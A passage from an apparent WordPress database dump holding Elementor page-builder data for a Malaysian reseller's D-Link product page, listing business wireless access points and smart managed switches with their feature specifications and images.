Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7677,3425,'_elementor_version','2.5.14'),(7678,3425,'_elementor_edit_mode','builder'),(7684,3426,'_elementor_version','2.5.14'),(7685,3426,'_elementor_edit_mode','builder'),(7688,3427,'_wp_page_template','template-fullwidth.php'),(7689,3427,'_elementor_template_type','post'),(7690,3427,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"284\",\"right\":\"284\",\"bottom\":\"284\",\"left\":\"284\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"69\",\"right\":\"69\",\"bottom\":\"69\",\"left\":\"69\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"802.11ac Wave 2 wireless, up to 1.75 Gbps\\n\\nMU-MIMO with beamforming\\n\\nBand steering\\n\\nGigabit PoE-capable LAN port\\n\\nAP Array utility support\\n\\nFree D-Link Central WiFiManager\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6ad865a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"254\",\"right\":\"254\",\"bottom\":\"254\",\"left\":\"254\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a79c898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"704cbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"7\",\"right\":\"7\",\"bottom\":\"7\",\"left\":\"7\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><center>[maxbutton id=\\\"6\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a9771aa\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"394708f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<\\/p><p>Suitable for virtualization, cloud services and server-to-server applications<\\/p><p>D-link Green Technology conserves energy by powering down unused ports<\\/p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>Support G.8032 ERPS to achieve high reliability and network stability<\\/p><p>802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>Support D-Link Network Assistant Utility to simplifies the configuration<\\/p><p>Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><center>[maxbutton id=\\\"6\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<\\/p><p>Suitable for virtualization, cloud services and server-to-server applications<\\/p><p>D-link Green Technology conserves energy by powering down unused ports<\\/p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>Support G.8032 ERPS to achieve high reliability and network stability<\\/p><p>802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>Support D-Link Network Assistant Utility to simplifies the configuration<\\/p><p>Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4e739a4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"6\",\"right\":\"6\",\"bottom\":\"6\",\"left\":\"6\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<\\/p><p>Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<\\/p><p>Support IEEE 802.1Q VLAN traffic segregation<\\/p><p>Auto Surveillance VLAN for easy integration with IP-based surveillance systems<\\/p><p>Loopback detection (LBD) and broadcast storm control to avoid network downtime<\\/p><p>Quality of Service (QOS) and bandwidth control to ensure smooth operation<\\/p><p>Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e75b16a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":93,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"0a878f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9ec8985\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":494,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"7a7732d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<\\/p><p>Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<\\/p><p>Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<\\/p><p>Support IEEE 802.1Q VLAN traffic segregation<\\/p><p>Access Control List (ACL) feature to enhances network security<\\/p><p>Auto Surveillance VLAN for easy integration with IP-based surveillance systems<\\/p><p>Loopback detection (LBD) and broadcast storm control to avoid network downtime<\\/p><p>Quality of Service (QOS) and bandwidth control to ensure smooth operation<\\/p><p>Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>Cable diagnostics function to help troubleshooting wiring problem<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a7b2c74\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"2d0384d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" 